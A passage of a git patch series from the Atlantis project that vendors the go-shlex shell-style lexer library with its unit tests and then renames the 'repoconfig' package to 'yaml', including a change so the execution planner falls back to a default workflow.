diff --git a/vendor/github.com/flynn-archive/go-shlex/Makefile b/vendor/github.com/flynn-archive/go-shlex/Makefile
new file mode 100644
index 0000000000..038d9a4896
--- /dev/null
+++ b/vendor/github.com/flynn-archive/go-shlex/Makefile
@@ -0,0 +1,21 @@
+# Copyright 2011 Google Inc. All Rights Reserved.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+include $(GOROOT)/src/Make.inc
+
+TARG=shlex
+GOFILES=\
+	shlex.go\
+
+include $(GOROOT)/src/Make.pkg
diff --git a/vendor/github.com/flynn-archive/go-shlex/README.md b/vendor/github.com/flynn-archive/go-shlex/README.md
new file mode 100644
index 0000000000..c86bcc066f
--- /dev/null
+++ b/vendor/github.com/flynn-archive/go-shlex/README.md
@@ -0,0 +1,2 @@
+go-shlex is a simple lexer for go that supports shell-style quoting,
+commenting, and escaping.
diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex.go b/vendor/github.com/flynn-archive/go-shlex/shlex.go
new file mode 100644
index 0000000000..7aeace801e
--- /dev/null
+++ b/vendor/github.com/flynn-archive/go-shlex/shlex.go
@@ -0,0 +1,457 @@
+/*
+Copyright 2012 Google Inc. All Rights Reserved.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package shlex
+
+/*
+Package shlex implements a simple lexer which splits input in to tokens using
+shell-style rules for quoting and commenting.
+*/
+import (
+	"bufio"
+	"errors"
+	"fmt"
+	"io"
+	"strings"
+)
+
+/*
+A TokenType is a top-level token; a word, space, comment, unknown.
+*/
+type TokenType int
+
+/*
+A RuneTokenType is the type of a UTF-8 character; a character, quote, space, escape.
+*/
+type RuneTokenType int
+
+type lexerState int
+
+type Token struct {
+	tokenType TokenType
+	value     string
+}
+
+/*
+Two tokens are equal if both their types and values are equal. A nil token can
+never equal another token.
+*/
+func (a *Token) Equal(b *Token) bool {
+	if a == nil || b == nil {
+		return false
+	}
+	if a.tokenType != b.tokenType {
+		return false
+	}
+	return a.value == b.value
+}
+
+const (
+	RUNE_CHAR              string = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._-,/@$*()+=><:;&^%~|!?[]{}"
+	RUNE_SPACE             string = " \t\r\n"
+	RUNE_ESCAPING_QUOTE    string = "\""
+	RUNE_NONESCAPING_QUOTE string = "'"
+	RUNE_ESCAPE                   = "\\"
+	RUNE_COMMENT                  = "#"
+
+	RUNETOKEN_UNKNOWN           RuneTokenType = 0
+	RUNETOKEN_CHAR              RuneTokenType = 1
+	RUNETOKEN_SPACE             RuneTokenType = 2
+	RUNETOKEN_ESCAPING_QUOTE    RuneTokenType = 3
+	RUNETOKEN_NONESCAPING_QUOTE RuneTokenType = 4
+	RUNETOKEN_ESCAPE            RuneTokenType = 5
+	RUNETOKEN_COMMENT           RuneTokenType = 6
+	RUNETOKEN_EOF               RuneTokenType = 7
+
+	TOKEN_UNKNOWN TokenType = 0
+	TOKEN_WORD    TokenType = 1
+	TOKEN_SPACE   TokenType = 2
+	TOKEN_COMMENT TokenType = 3
+
+	STATE_START           lexerState = 0
+	STATE_INWORD          lexerState = 1
+	STATE_ESCAPING        lexerState = 2
+	STATE_ESCAPING_QUOTED lexerState = 3
+	STATE_QUOTED_ESCAPING lexerState = 4
+	STATE_QUOTED          lexerState = 5
+	STATE_COMMENT         lexerState = 6
+
+	INITIAL_TOKEN_CAPACITY int = 100
+)
+
+/*
+A type for classifying characters. This allows for different sorts of
+classifiers - those accepting extended non-ascii chars, or strict posix
+compatibility, for example.
+*/
+type TokenClassifier struct {
+	typeMap map[int32]RuneTokenType
+}
+
+func addRuneClass(typeMap *map[int32]RuneTokenType, runes string, tokenType RuneTokenType) {
+	for _, rune := range runes {
+		(*typeMap)[int32(rune)] = tokenType
+	}
+}
+
+/*
+Create a new classifier for basic ASCII characters.
+*/
+func NewDefaultClassifier() *TokenClassifier {
+	typeMap := map[int32]RuneTokenType{}
+	addRuneClass(&typeMap, RUNE_CHAR, RUNETOKEN_CHAR)
+	addRuneClass(&typeMap, RUNE_SPACE, RUNETOKEN_SPACE)
+	addRuneClass(&typeMap, RUNE_ESCAPING_QUOTE, RUNETOKEN_ESCAPING_QUOTE)
+	addRuneClass(&typeMap, RUNE_NONESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE)
+	addRuneClass(&typeMap, RUNE_ESCAPE, RUNETOKEN_ESCAPE)
+	addRuneClass(&typeMap, RUNE_COMMENT, RUNETOKEN_COMMENT)
+	return &TokenClassifier{
+		typeMap: typeMap}
+}
+
+func (classifier *TokenClassifier) ClassifyRune(rune int32) RuneTokenType {
+	return classifier.typeMap[rune]
+}
+
+/*
+A type for turning an input stream in to a sequence of strings. Whitespace and
+comments are skipped.
+*/
+type Lexer struct {
+	tokenizer *Tokenizer
+}
+
+/*
+Create a new lexer.
+*/
+func NewLexer(r io.Reader) (*Lexer, error) {
+
+	tokenizer, err := NewTokenizer(r)
+	if err != nil {
+		return nil, err
+	}
+	lexer := &Lexer{tokenizer: tokenizer}
+	return lexer, nil
+}
+
+/*
+Return the next word, and an error value. If there are no more words, the error
+will be io.EOF.
+*/
+func (l *Lexer) NextWord() (string, error) {
+	var token *Token
+	var err error
+	for {
+		token, err = l.tokenizer.NextToken()
+		if err != nil {
+			return "", err
+		}
+		switch token.tokenType {
+		case TOKEN_WORD:
+			{
+				return token.value, nil
+			}
+		case TOKEN_COMMENT:
+			{
+				// skip comments
+			}
+		default:
+			{
+				panic(fmt.Sprintf("Unknown token type: %v", token.tokenType))
+			}
+		}
+	}
+	return "", io.EOF
+}
+
+/*
+A type for turning an input stream in to a sequence of typed tokens.
+*/
+type Tokenizer struct {
+	input      *bufio.Reader
+	classifier *TokenClassifier
+}
+
+/*
+Create a new tokenizer.
+*/
+func NewTokenizer(r io.Reader) (*Tokenizer, error) {
+	input := bufio.NewReader(r)
+	classifier := NewDefaultClassifier()
+	tokenizer := &Tokenizer{
+		input:      input,
+		classifier: classifier}
+	return tokenizer, nil
+}
+
+/*
+Scan the stream for the next token.
+
+This uses an internal state machine. It will panic if it encounters a character
+which it does not know how to handle.
+*/
+func (t *Tokenizer) scanStream() (*Token, error) {
+	state := STATE_START
+	var tokenType TokenType
+	value := make([]int32, 0, INITIAL_TOKEN_CAPACITY)
+	var (
+		nextRune     int32
+		nextRuneType RuneTokenType
+		err          error
+	)
+SCAN:
+	for {
+		nextRune, _, err = t.input.ReadRune()
+		nextRuneType = t.classifier.ClassifyRune(nextRune)
+		if err != nil {
+			if err == io.EOF {
+				nextRuneType = RUNETOKEN_EOF
+				err = nil
+			} else {
+				return nil, err
+			}
+		}
+		switch state {
+		case STATE_START: // no runes read yet
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						return nil, io.EOF
+					}
+				case RUNETOKEN_CHAR:
+					{
+						tokenType = TOKEN_WORD
+						value = append(value, nextRune)
+						state = STATE_INWORD
+					}
+				case RUNETOKEN_SPACE:
+					{
+					}
+				case RUNETOKEN_ESCAPING_QUOTE:
+					{
+						tokenType = TOKEN_WORD
+						state = STATE_QUOTED_ESCAPING
+					}
+				case RUNETOKEN_NONESCAPING_QUOTE:
+					{
+						tokenType = TOKEN_WORD
+						state = STATE_QUOTED
+					}
+				case RUNETOKEN_ESCAPE:
+					{
+						tokenType = TOKEN_WORD
+						state = STATE_ESCAPING
+					}
+				case RUNETOKEN_COMMENT:
+					{
+						tokenType = TOKEN_COMMENT
+						state = STATE_COMMENT
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Unknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_INWORD: // in a regular word
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_COMMENT:
+					{
+						value = append(value, nextRune)
+					}
+				case RUNETOKEN_SPACE:
+					{
+						t.input.UnreadRune()
+						break SCAN
+					}
+				case RUNETOKEN_ESCAPING_QUOTE:
+					{
+						state = STATE_QUOTED_ESCAPING
+					}
+				case RUNETOKEN_NONESCAPING_QUOTE:
+					{
+						state = STATE_QUOTED
+					}
+				case RUNETOKEN_ESCAPE:
+					{
+						state = STATE_ESCAPING
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_ESCAPING: // the next rune after an escape character
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						err = errors.New("EOF found after escape character")
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT:
+					{
+						state = STATE_INWORD
+						value = append(value, nextRune)
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_ESCAPING_QUOTED: // the next rune after an escape character, in double quotes
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						err = errors.New("EOF found after escape character")
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT:
+					{
+						state = STATE_QUOTED_ESCAPING
+						value = append(value, nextRune)
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_QUOTED_ESCAPING: // in escaping double quotes
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						err = errors.New("EOF found when expecting closing quote.")
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_NONESCAPING_QUOTE, RUNETOKEN_COMMENT:
+					{
+						value = append(value, nextRune)
+					}
+				case RUNETOKEN_ESCAPING_QUOTE:
+					{
+						state = STATE_INWORD
+					}
+				case RUNETOKEN_ESCAPE:
+					{
+						state = STATE_ESCAPING_QUOTED
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_QUOTED: // in non-escaping single quotes
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						err = errors.New("EOF found when expecting closing quote.")
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_SPACE, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT:
+					{
+						value = append(value, nextRune)
+					}
+				case RUNETOKEN_NONESCAPING_QUOTE:
+					{
+						state = STATE_INWORD
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		case STATE_COMMENT:
+			{
+				switch nextRuneType {
+				case RUNETOKEN_EOF:
+					{
+						break SCAN
+					}
+				case RUNETOKEN_CHAR, RUNETOKEN_UNKNOWN, RUNETOKEN_ESCAPING_QUOTE, RUNETOKEN_ESCAPE, RUNETOKEN_COMMENT, RUNETOKEN_NONESCAPING_QUOTE:
+					{
+						value = append(value, nextRune)
+					}
+				case RUNETOKEN_SPACE:
+					{
+						if nextRune == '\n' {
+							state = STATE_START
+							break SCAN
+						} else {
+							value = append(value, nextRune)
+						}
+					}
+				default:
+					{
+						return nil, errors.New(fmt.Sprintf("Uknown rune: %v", nextRune))
+					}
+				}
+			}
+		default:
+			{
+				panic(fmt.Sprintf("Unexpected state: %v", state))
+			}
+		}
+	}
+	token := &Token{
+		tokenType: tokenType,
+		value:     string(value)}
+	return token, err
+}
+
+/*
+Return the next token in the stream, and an error value. If there are no more
+tokens available, the error value will be io.EOF.
+*/
+func (t *Tokenizer) NextToken() (*Token, error) {
+	return t.scanStream()
+}
+
+/*
+Split a string in to a slice of strings, based upon shell-style rules for
+quoting, escaping, and spaces.
+*/
+func Split(s string) ([]string, error) {
+	l, err := NewLexer(strings.NewReader(s))
+	if err != nil {
+		return nil, err
+	}
+	subStrings := []string{}
+	for {
+		word, err := l.NextWord()
+		if err != nil {
+			if err == io.EOF {
+				return subStrings, nil
+			}
+			return subStrings, err
+		}
+		subStrings = append(subStrings, word)
+	}
+	return subStrings, nil
+}
diff --git a/vendor/github.com/flynn-archive/go-shlex/shlex_test.go b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go
new file mode 100644
index 0000000000..7551f7c598
--- /dev/null
+++ b/vendor/github.com/flynn-archive/go-shlex/shlex_test.go
@@ -0,0 +1,162 @@
+/*
+Copyright 2012 Google Inc. All Rights Reserved.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package shlex
+
+import (
+	"strings"
+	"testing"
+)
+
+func checkError(err error, t *testing.T) {
+	if err != nil {
+		t.Error(err)
+	}
+}
+
+func TestClassifier(t *testing.T) {
+	classifier := NewDefaultClassifier()
+	runeTests := map[int32]RuneTokenType{
+		'a':  RUNETOKEN_CHAR,
+		' ':  RUNETOKEN_SPACE,
+		'"':  RUNETOKEN_ESCAPING_QUOTE,
+		'\'': RUNETOKEN_NONESCAPING_QUOTE,
+		'#':  RUNETOKEN_COMMENT}
+	for rune, expectedType := range runeTests {
+		foundType := classifier.ClassifyRune(rune)
+		if foundType != expectedType {
+			t.Logf("Expected type: %v for rune '%c'(%v). Found type: %v.", expectedType, rune, rune, foundType)
+			t.Fail()
+		}
+	}
+}
+
+func TestTokenizer(t *testing.T) {
+	testInput := strings.NewReader("one two \"three four\" \"five \\\"six\\\"\" seven#eight # nine # ten\n eleven")
+	expectedTokens := []*Token{
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "one"},
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "two"},
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "three four"},
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "five \"six\""},
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "seven#eight"},
+		&Token{
+			tokenType: TOKEN_COMMENT,
+			value:     " nine # ten"},
+		&Token{
+			tokenType: TOKEN_WORD,
+			value:     "eleven"}}
+
+	tokenizer, err := NewTokenizer(testInput)
+	checkError(err, t)
+	for _, expectedToken := range expectedTokens {
+		foundToken, err := tokenizer.NextToken()
+		checkError(err, t)
+		if !foundToken.Equal(expectedToken) {
+			t.Error("Expected token:", expectedToken, ". Found:", foundToken)
+		}
+	}
+}
+
+func TestLexer(t *testing.T) {
+	testInput := strings.NewReader("one")
+	expectedWord := "one"
+	lexer, err := NewLexer(testInput)
+	checkError(err, t)
+	foundWord, err := lexer.NextWord()
+	checkError(err, t)
+	if expectedWord != foundWord {
+		t.Error("Expected word:", expectedWord, ". Found:", foundWord)
+	}
+}
+
+func TestSplitSimple(t *testing.T) {
+	testInput := "one two three"
+	expectedOutput := []string{"one", "two", "three"}
+	foundOutput, err := Split(testInput)
+	if err != nil {
+		t.Error("Split returned error:", err)
+	}
+	if len(expectedOutput) != len(foundOutput) {
+		t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results")
+	}
+	for i := range foundOutput {
+		if foundOutput[i] != expectedOutput[i] {
+			t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i])
+		}
+	}
+}
+
+func TestSplitEscapingQuotes(t *testing.T) {
+	testInput := "one \"два ${three}\" four"
+	expectedOutput := []string{"one", "два ${three}", "four"}
+	foundOutput, err := Split(testInput)
+	if err != nil {
+		t.Error("Split returned error:", err)
+	}
+	if len(expectedOutput) != len(foundOutput) {
+		t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results")
+	}
+	for i := range foundOutput {
+		if foundOutput[i] != expectedOutput[i] {
+			t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i])
+		}
+	}
+}
+
+func TestGlobbingExpressions(t *testing.T) {
+	testInput := "onefile *file one?ile onefil[de]"
+	expectedOutput := []string{"onefile", "*file", "one?ile", "onefil[de]"}
+	foundOutput, err := Split(testInput)
+	if err != nil {
+		t.Error("Split returned error", err)
+	}
+	if len(expectedOutput) != len(foundOutput) {
+		t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results")
+	}
+	for i := range foundOutput {
+		if foundOutput[i] != expectedOutput[i] {
+			t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i])
+		}
+	}
+
+}
+
+func TestSplitNonEscapingQuotes(t *testing.T) {
+	testInput := "one 'два ${three}' four"
+	expectedOutput := []string{"one", "два ${three}", "four"}
+	foundOutput, err := Split(testInput)
+	if err != nil {
+		t.Error("Split returned error:", err)
+	}
+	if len(expectedOutput) != len(foundOutput) {
+		t.Error("Split expected:", len(expectedOutput), "results. Found:", len(foundOutput), "results")
+	}
+	for i := range foundOutput {
+		if foundOutput[i] != expectedOutput[i] {
+			t.Error("Item:", i, "(", foundOutput[i], ") differs from the expected value:", expectedOutput[i])
+		}
+	}
+}

From 69c788ec663e3b086eecdb70a8fac8b35c26c4e3 Mon Sep 17 00:00:00 2001
From: Luke Kysow <lkysow@gmail.com>
Date: Thu, 7 Jun 2018 15:40:48 +0100
Subject: [PATCH 13/69] Rename package repoconfig to yaml

---
 server/events/apply_executor.go               |   4 +-
 server/events/plan_executor.go                |   4 +-
 server/events/repoconfig/run_step_test.go     |   3 -
 .../events/{repoconfig => yaml}/apply_step.go |   2 +-
 .../{repoconfig => yaml}/apply_step_test.go   |  16 +--
 server/events/{repoconfig => yaml}/config.go  |   2 +-
 .../{repoconfig => yaml}/execution_planner.go |   6 +-
 .../events/{repoconfig => yaml}/init_step.go  |   2 +-
 .../{repoconfig => yaml}/init_step_test.go    |   8 +-
 .../events/{repoconfig => yaml}/plan_step.go  |   2 +-
 .../{repoconfig => yaml}/plan_step_test.go    |  28 ++--
 server/events/{repoconfig => yaml}/reader.go  |   6 +-
 .../{repoconfig => yaml}/reader_test.go       | 124 +++++++++++-------
 .../events/{repoconfig => yaml}/repoconfig.go |   2 +-
 .../events/{repoconfig => yaml}/run_step.go   |   2 +-
 server/events/yaml/run_step_test.go           |   3 +
 server/server.go                              |   6 +-
 17 files changed, 123 insertions(+), 97 deletions(-)
 delete mode 100644 server/events/repoconfig/run_step_test.go
 rename server/events/{repoconfig => yaml}/apply_step.go (97%)
 rename server/events/{repoconfig => yaml}/apply_step_test.go (89%)
 rename server/events/{repoconfig => yaml}/config.go (99%)
 rename server/events/{repoconfig => yaml}/execution_planner.go (95%)
 rename server/events/{repoconfig => yaml}/init_step.go (97%)
 rename server/events/{repoconfig => yaml}/init_step_test.go (92%)
 rename server/events/{repoconfig => yaml}/plan_step.go (99%)
 rename server/events/{repoconfig => yaml}/plan_step_test.go (95%)
 rename server/events/{repoconfig => yaml}/reader.go (93%)
 rename server/events/{repoconfig => yaml}/reader_test.go (85%)
 rename server/events/{repoconfig => yaml}/repoconfig.go (99%)
 rename server/events/{repoconfig => yaml}/run_step.go (97%)
 create mode 100644 server/events/yaml/run_step_test.go

diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go
index 534546997d..6562d8ab8e 100644
--- a/server/events/apply_executor.go
+++ b/server/events/apply_executor.go
@@ -15,11 +15,11 @@ package events
 
 import (
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
 	"github.com/runatlantis/atlantis/server/events/webhooks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 )
 
 // ApplyExecutor handles executing terraform apply.
@@ -31,7 +31,7 @@ type ApplyExecutor struct {
 	AtlantisWorkspace AtlantisWorkspace
 	ProjectLocker     *DefaultProjectLocker
 	Webhooks          webhooks.Sender
-	ExecutionPlanner  *repoconfig.ExecutionPlanner
+	ExecutionPlanner  *yaml.ExecutionPlanner
 }
 
 // Execute executes apply for the ctx.
diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go
index 4983c17701..a620f2cb43 100644
--- a/server/events/plan_executor.go
+++ b/server/events/plan_executor.go
@@ -18,10 +18,10 @@ import (
 
 	"github.com/runatlantis/atlantis/server/events/locking"
 	"github.com/runatlantis/atlantis/server/events/models"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	"github.com/runatlantis/atlantis/server/events/run"
 	"github.com/runatlantis/atlantis/server/events/terraform"
 	"github.com/runatlantis/atlantis/server/events/vcs"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 )
 
 //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator
@@ -39,7 +39,7 @@ type PlanExecutor struct {
 	Workspace        AtlantisWorkspace
 	ProjectFinder    ProjectFinder
 	ProjectLocker    ProjectLocker
-	ExecutionPlanner *repoconfig.ExecutionPlanner
+	ExecutionPlanner *yaml.ExecutionPlanner
 	LockURLGenerator LockURLGenerator
 }
 
diff --git a/server/events/repoconfig/run_step_test.go b/server/events/repoconfig/run_step_test.go
deleted file mode 100644
index fdab8a9b5f..0000000000
--- a/server/events/repoconfig/run_step_test.go
+++ /dev/null
@@ -1,3 +0,0 @@
-package repoconfig
-
-// todo
diff --git a/server/events/repoconfig/apply_step.go b/server/events/yaml/apply_step.go
similarity index 97%
rename from server/events/repoconfig/apply_step.go
rename to server/events/yaml/apply_step.go
index d883c3a02c..4b6a360612 100644
--- a/server/events/repoconfig/apply_step.go
+++ b/server/events/yaml/apply_step.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
diff --git a/server/events/repoconfig/apply_step_test.go b/server/events/yaml/apply_step_test.go
similarity index 89%
rename from server/events/repoconfig/apply_step_test.go
rename to server/events/yaml/apply_step_test.go
index 37e0af2f71..f2066140e2 100644
--- a/server/events/repoconfig/apply_step_test.go
+++ b/server/events/yaml/apply_step_test.go
@@ -1,4 +1,4 @@
-package repoconfig_test
+package yaml_test
 
 import (
 	"io/ioutil"
@@ -8,15 +8,15 @@ import (
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	. "github.com/runatlantis/atlantis/testing"
 )
 
 func TestRun_NoDir(t *testing.T) {
-	s := repoconfig.ApplyStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.ApplyStep{
+		Meta: yaml.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          "nonexistent/path",
 			DirRelativeToRepoRoot: ".",
@@ -33,8 +33,8 @@ func TestRun_NoPlanFile(t *testing.T) {
 	tmpDir, cleanup := TempDir(t)
 	defer cleanup()
 
-	s := repoconfig.ApplyStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.ApplyStep{
+		Meta: yaml.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
@@ -58,8 +58,8 @@ func TestRun_Success(t *testing.T) {
 	terraform := mocks.NewMockClient()
 
 	tfVersion, _ := version.NewVersion("0.11.4")
-	s := repoconfig.ApplyStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.ApplyStep{
+		Meta: yaml.StepMeta{
 			Workspace:             "workspace",
 			AbsolutePath:          tmpDir,
 			DirRelativeToRepoRoot: ".",
diff --git a/server/events/repoconfig/config.go b/server/events/yaml/config.go
similarity index 99%
rename from server/events/repoconfig/config.go
rename to server/events/yaml/config.go
index acdc7a0ce6..3fffcf0135 100644
--- a/server/events/repoconfig/config.go
+++ b/server/events/yaml/config.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
diff --git a/server/events/repoconfig/execution_planner.go b/server/events/yaml/execution_planner.go
similarity index 95%
rename from server/events/repoconfig/execution_planner.go
rename to server/events/yaml/execution_planner.go
index c94001925e..c349034004 100644
--- a/server/events/repoconfig/execution_planner.go
+++ b/server/events/yaml/execution_planner.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
@@ -96,7 +96,9 @@ func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogge
 			return steps, nil
 		}
 	}
-	return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace)
+	// They haven't defined this project, use the default workflow.
+	log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace)
+	return defaults, nil
 }
 
 func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) {
diff --git a/server/events/repoconfig/init_step.go b/server/events/yaml/init_step.go
similarity index 97%
rename from server/events/repoconfig/init_step.go
rename to server/events/yaml/init_step.go
index 022399c4fb..235b90244e 100644
--- a/server/events/repoconfig/init_step.go
+++ b/server/events/yaml/init_step.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 // InitStep runs `terraform init`.
 type InitStep struct {
diff --git a/server/events/repoconfig/init_step_test.go b/server/events/yaml/init_step_test.go
similarity index 92%
rename from server/events/repoconfig/init_step_test.go
rename to server/events/yaml/init_step_test.go
index 1996e18d18..bfdbd84b5f 100644
--- a/server/events/repoconfig/init_step_test.go
+++ b/server/events/yaml/init_step_test.go
@@ -1,4 +1,4 @@
-package repoconfig_test
+package yaml_test
 
 import (
 	"testing"
@@ -6,9 +6,9 @@ import (
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -43,8 +43,8 @@ func TestRun_UsesGetOrInitForRightVersion(t *testing.T) {
 
 			tfVersion, _ := version.NewVersion(c.version)
 			logger := logging.NewNoopLogger()
-			s := repoconfig.InitStep{
-				Meta: repoconfig.StepMeta{
+			s := yaml.InitStep{
+				Meta: yaml.StepMeta{
 					Log:                   logger,
 					Workspace:             "workspace",
 					AbsolutePath:          "/path",
diff --git a/server/events/repoconfig/plan_step.go b/server/events/yaml/plan_step.go
similarity index 99%
rename from server/events/repoconfig/plan_step.go
rename to server/events/yaml/plan_step.go
index 6e7df0db0b..99890e62ea 100644
--- a/server/events/repoconfig/plan_step.go
+++ b/server/events/yaml/plan_step.go
@@ -1,4 +1,4 @@
-package repoconfig
+package yaml
 
 import (
 	"fmt"
diff --git a/server/events/repoconfig/plan_step_test.go b/server/events/yaml/plan_step_test.go
similarity index 95%
rename from server/events/repoconfig/plan_step_test.go
rename to server/events/yaml/plan_step_test.go
index 7e9e8b1f22..91e9372d37 100644
--- a/server/events/repoconfig/plan_step_test.go
+++ b/server/events/yaml/plan_step_test.go
@@ -1,4 +1,4 @@
-package repoconfig_test
+package yaml_test
 
 import (
 	"errors"
@@ -10,9 +10,9 @@ import (
 	"github.com/hashicorp/go-version"
 	. "github.com/petergtz/pegomock"
 	"github.com/runatlantis/atlantis/server/events/mocks/matchers"
-	"github.com/runatlantis/atlantis/server/events/repoconfig"
 	matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers"
 	"github.com/runatlantis/atlantis/server/events/terraform/mocks"
+	"github.com/runatlantis/atlantis/server/events/yaml"
 	"github.com/runatlantis/atlantis/server/logging"
 	. "github.com/runatlantis/atlantis/testing"
 )
@@ -25,8 +25,8 @@ func TestRun_NoWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "default"
-	s := repoconfig.PlanStep{
-		Meta: repoconfig.StepMeta{
+	s := yaml.PlanStep{
+		Meta: yaml.StepMeta{
 			Log:                   logger,
 			Workspace:             workspace,
 			AbsolutePath:          "/path",
@@ -61,8 +61,8 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) {
 	tfVersion, _ := version.NewVersion("0.8")
 	logger := logging.NewNoopLogger()
 	workspace := "notdefault"
-	s := repoconfig.PlanStep{
